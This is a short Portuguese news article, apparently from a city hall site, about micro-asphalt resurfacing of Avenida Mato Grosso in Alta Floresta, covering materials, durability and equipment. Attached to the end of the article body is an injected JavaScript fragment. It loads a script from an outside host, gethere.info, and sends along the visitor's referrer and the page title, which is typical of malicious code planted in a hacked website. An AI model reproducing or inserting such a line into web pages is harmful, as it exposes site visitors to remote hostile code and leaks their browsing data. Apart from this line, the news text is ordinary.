Capa / Em Destaque / Prefeitura de Alta Floresta retoma construção de micropavimento asfáltico na Avenida Mato Grosso

Prefeitura de Alta Floresta retoma construção de micropavimento asfáltico na Avenida Mato Grosso

capa-asafaltoLindomar Leal
Assessoria de Comunicação
Secretaria de Infraestrutura

A Prefeitura de Alta Floresta, por meio da Secretaria Municipal de Infraestrutura, retomou na última segunda-feira, 03, as obras de restauração do asfalto da Avenida Mato Grosso, uma das principais vias que interliga o centro à Cidade Alta. A obra é executado com recursos próprios.

A construção de aproximadamente 20 mil metros quadrados de micropavimento asfáltico começou na sexta-feira (23.09) e deve resolver os problemas ocasionados pela deterioração do pavimento existente. De acordo com a Secretaria Municipal de Infraestrutura (SINFRA), a obra dará mais resistência e durabilidade ao asfalto evitando a formação de erosões.

O micropavimento asfáltico é constituído de pedrisco, duas camadas de piche e compactado por um rolo. De acordo com a SINFRA, a espessura de aproximadamente dois centímetros é suficiente para manter uma durabilidade de cerca de 10 anos. Para realizar esta obra, a Secretaria Municipal de Infraestrutura está utilizando caminhões basculantes, trator com rolo compactador, caminhão tanque para transportar o material betuminoso, além de 10 funcionários envolvidos diretamente na aplicação dos produtos.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top